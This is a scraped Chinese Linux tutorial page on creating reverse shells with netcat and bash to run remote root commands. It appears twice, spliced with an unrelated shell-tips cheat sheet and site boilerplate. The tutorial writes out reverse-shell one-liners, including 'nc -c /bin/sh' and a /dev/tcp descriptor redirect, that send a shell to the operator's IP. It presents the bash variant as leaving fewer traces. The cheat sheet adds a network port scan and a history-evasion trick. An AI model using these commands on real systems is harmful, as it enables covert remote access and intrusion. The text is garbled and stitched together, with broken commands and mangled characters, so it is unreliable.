如何创建流量检测反向shelll来执行远程Root命令

如何使用NetCat或BASH创建反向Shell来执行远程Root命令_Linux教程_Linux公社-Linux系统门户网站
你好,游客
如何使用NetCat或BASH创建反向Shell来执行远程Root命令
来源:aqee.net&
作者:Linux
反向shell(Reverse shell)是一种往远程机器发送shell命令的技术,当远程机器处在防火墙等其它东西后面时,这种技术会变得非常有用。你也许会说,&一个普通的shell或简单的SSH通道不是也能实现这些吗?&不,无法实现。在网上,我看到很多人对普通shell和反向shell之间的区别分不清。在我们开始下面的内容前,先弄清楚这些概念。
反向Shell(Reverse Shell)
反向shell的工作方式是远程计算机将自己的shell发送给特定的用户,而不是将shell绑定到一个端口上。后者在很多环境中是无法访问的。这样,你就可以对远程服务器执行root命令。
Bind Shell
bind shell是用户用BSAH,将shell绑定到一个本地端口上,这样任何人都可以在本地网络中发送命令。
反向shell经常会被黑客用来做一些不法行为,例如入侵了一台服务器后,他们会设置一个反向shell,将来他们就能通过这个shell轻松的访问这台远程计算机。我相信你是不会用它来做这种事情的。
远程Unix主机
安装了netcat
使用NetCat实现反向shell交互
当通过shell登录到远程主机后,下面的指令能轻松的将shell发送到你的机器上:
nc -c /bin/sh &你的IP& &任何一个未封锁的端口&
你甚至能通过netcat来pipe BASH。
/bin/sh | nc &你的IP& &任何未封锁的端口&
然后监听这个shell:
nc -l -p &相同的端口& -vvv
通过BASH实现反向shell
这种技术是当远程机器上没有netcat或你想做一些非自然的事情而不想留下太重的痕迹时使用。
监听shell:
nc -l -p &任何未封锁的端口& -vvv
先创建一个新的描述符,分配到一个网络节点。这样我们可以对这个描述符进行读写。
exec 5&&/dev//&相同的端口& $ cat &&5 | do $line 2&&5 &&5; done
或另外一个反向shell:
0&&196;exec 196&&/dev/tcp/&你的IP&/&相同的端口&; sh &&196 &&196 2&&196
这样,你就可以轻松是通过netcat发送任何命令了。
相关资讯 & & &
& (03月25日)
& (12/14/:20)
& (03月27日)
& (12/19/:48)
& (09/25/:19)
   同意评论声明
   发表
尊重网上道德,遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论
参与本评论即表明您已经阅读并接受上述条款Linux中shell命令的用法和技巧-linux-操作系统-壹聚教程网Linux中shell命令的用法和技巧
shell命令在linux中是非常重要的一个命令了,本文章给大家介绍Linux中shell命令的用法和技巧,如果你正在学习linux不防进入参考。
使用Linux shell是我每天的基本工作,但我经常会忘记一些有用的shell命令和l技巧。当然,命令我能记住,但我不敢说能记得如何用它执行某个特定任务。于是,我开始在一个文本文件里记录这些用法,并放在我的Dropbox里,现在,向大家分享这个文件。这个文件我会不断的更新。需要注意一点的是,有些用法需要在你的Linux系统里安装额外的软件。
UPDATE: November 25, 2013
检查远程端口是否对bash开放:
echo &/dev/tcp/8.8.8.8/53 && echo &open&
让进程转入后台:
将进程转到前台:
产生随机的十六进制数,其中n是字符数:
openssl rand -hex n
在当前shell里执行一个文件里的命令:
source /home/user/file.name
截取前5个字符:
${variable:0:5}
SSH debug 模式:
ssh -vvv user@ip_address
SSH with pem key:
ssh user@ip_address -i key.pem
用wget抓取完整的网站目录结构,存放到本地目录中:
wget -r --no-parent --reject &index.html*& http://hostname/ -P /home/user/dirs
一次创建多个目录:
mkdir -p /home/user/{test,test1,test2}
列出包括子进程的进程树:
创建 war 文件:
jar -cvf name.war file
测试硬盘写入速度:
dd if=/dev/zero of=/tmp/output.img bs=8k count=256k; rm -rf /tmp/output.img
测试硬盘读取速度:
hdparm -Tt /dev/sda
获取文本的md5 hash:
echo -n &text& | md5sum
检查xml格式:
xmllint --noout file.xml
将tar.gz提取到新目录里:
tar zxvf package.tar.gz -C new_dir
使用curl获取HTTP头信息:
curl -I http://www.111cn.net
修改文件或目录的时间戳(YYMMDDhhmm):
用wget命令执行ftp下载:
wget -m ftp://username:pass@hostname
生成随机密码(例子里是16个字符长):
LANG=c & /dev/urandom tr -dc _A-Z-a-z-0-9 | head -c${1:-16};
快速备份一个文件:
cp some_file_name{,.bkp}
访问Windows共享目录:
smbclient -U &DOMAINuser& ///share/test/dir
执行历史记录里的命令(这里是第100行):
unzip package_name.zip -d dir_name
输入多行文字(CTRL + d 退出):
cat & test.txt
创建空文件或清空一个现有文件:
& test.txt
与 NTP server同步时间:
用netstat显示所有tcp4监听端口:
netstat -lnt4 | awk '{print $4}' | cut -f2 -d: | grep -o '[0-9]*'
qcow2镜像文件转换:
qemu-img convert -f qcow2 -O raw precise-server-cloudimg-amd64-disk1.img
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& precise-server-cloudimg-amd64-disk1.raw
重复运行文件,显示其输出(缺省是2秒一次):
watch ps -ef
所有用户列表:
getent passwd
Mount root in read/write mode:
mount -o remount,rw /
挂载一个目录(这是不能使用链接的情况):
mount --bind /source /destination
动态更新DNS server:
nsupdate & &EOF
update add $HOST 86400 A $IP
递归grep所有目录:
grep -r &some_text& /path/to/dir
列出前10个最大的文件:
lsof / | awk '{ if($7 & 1048576) print $7/1048576 &MB &$9 }' | sort -n -u | tail
显示剩余内存(MB):
free -m | grep cache | awk '/[0-9]/{ print $4& MB& }'
打开Vim并跳到文件末:
vim + some_file_name
Git 克隆指定分支(master):
git clone :name/app.git -b master
Git 切换到其它分支(develop):
git checkout develop
Git 删除分支(myfeature):
git branch -d myfeature
Git 删除远程分支
git push origin :branchName
Git 将新分支推送到远程服务器:
git push -u origin mynewfeature
打印历史记录中最后一次cat命令:
运行历史记录里最后一次cat命令:
找出/home/user下所有空子目录:
find /home/user -maxdepth 1 -type d -empty
获取test.txt文件中第50-60行内容:
& test.txt sed -n '50,60p'
运行最后一个命令(如果最后一个命令是mkdir /root/test, 下面将会运行: sudo mkdir /root/test):
创建临时RAM文件系统 & ramdisk (先创建/tmpram目录):
mount -t tmpfs tmpfs /tmpram -o size=512m
Grep whole words:
grep -w &name& test.txt
在需要提升权限的情况下往一个文件里追加文本:
echo &some text& | sudo tee -a /path/file
列出所有kill signal参数:
在bash历史记录里禁止记录最后一次会话:
kill -9 $$
扫描网络寻找开放的端口:
nmap -p .0.0/16
设置git email:
git config --global user.email &&
To sync with master if you have unpublished commits:
git pull --rebase origin master
将所有文件名中含有&txt&的文件移入/home/user目录:
find -iname &*txt*& -exec mv -v {} /home/
将文件按行并列显示:
paste test.txt test1.txt
shell里的进度条:
pv data.log
使用netcat将数据发送到Graphite server:
echo &hosts.sampleHost 10 `date +%s`& | nc 192.168.200.2 3000
将tabs转换成空格:
expand test.txt & test1.txt
Skip bash history:
& space &cmd
去之前的工作目录:
拆分大体积的tar.gz文件(每个100MB),然后合并回去:
split &b 100m /path/to/large/archive /path/to/output/files
cat files* & archive
使用curl获取HTTP status code:
curl -sL -w &%{http_code}\n& www.111cn.net -o /dev/null
设置,强化MySQL安全安装:
/usr/bin/mysql_secure_installation
当Ctrl + c不好使时:
获取文件owner:
stat -c %U file.txt
block设备列表:
找出文件名结尾有空格的文件:
find . -type f -exec egrep -l & +$& {} ;
找出文件名有tab缩进符的文件
find . -type f -exec egrep -l $'t' {} ;
用&=&打印出横线:
printf '%100sn' | tr ' ' =
上一页: &&&&&下一页:相关内容您的浏览器已经禁用了脚本,这可能会影响您正常使用本站的功能。
如何使用NetCat或BASH创建反向Shell来执行远程Root命令
反向(Reverse shell)是一种往远程机器发送shell命令的技术,当远程机器处在防火墙等其它东西后面时,这种技术会变得非常有用。你也许会说,&一个普通的shell或简单的通道不是也能实现这些吗?&不,无法实现。在网上,我看到很多人对普通shell和反向shell之间的区别分不清。在我们开始下面的内容前,先弄清楚这些概念。
反向Shell(Reverse Shell)
反向shell的工作方式是远程计算机将自己的shell发送给特定的用户,而不是将shell绑定到一个端口上。后者在很多环境中是无法访问的。这样,你就可以对远程服务器执行root命令。
bind shell是用户用BSAH,将shell绑定到一个本地端口上,这样任何人都可以在本地网络中发送命令。
反向shell经常会被黑客用来做一些不法行为,例如入侵了一台服务器后,他们会设置一个反向shell,将来他们就能通过这个shell轻松的访问这台远程计算机。我相信你是不会用它来做这种事情的。
远程Unix主机
使用NetCat实现反向shell交互
当通过shell登录到远程主机后,下面的指令能轻松的将shell发送到你的机器上:
-c /bin/sh &你的& &任何一个未封锁的端口&
你甚至能通过netcat来pipe BASH。
/bin/sh | nc &你的IP& &任何未封锁的端口&
然后监听这个shell:
nc -l -p &相同的端口& -vvv
通过BASH实现反向shell
这种技术是当远程机器上没有netcat或你想做一些非自然的事情而不想留下太重的痕迹时使用。
监听shell:
nc -l -p &任何未封锁的端口& -vvv
先创建一个新的描述符,分配到一个网络节点。这样我们可以对这个描述符进行读写。
5&&/dev//&相同的端口& $
&&5 | while
do $line 2&&5 &&5; done
或另外一个反向shell:
0&&196;exec 196&&/dev/tcp/&你的IP&/&相同的端口&; sh &&196 &&196 2&&196
这样,你就可以轻松是通过netcat发送任何命令了。
[英文原文: ]
转自:http://www.aqee.net/create-reverse-shell-to-remotely-execute-root-commands-using-netcat-or-bash/
收藏Ctrl+D
关注Linux/Unix应用技术、业界新闻,同时也发布开源、移动互联网等新鲜资讯!
—— Powered ——运行在

我要回帖

更多关于 nslookup反向解析命令 的文章

 

随机推荐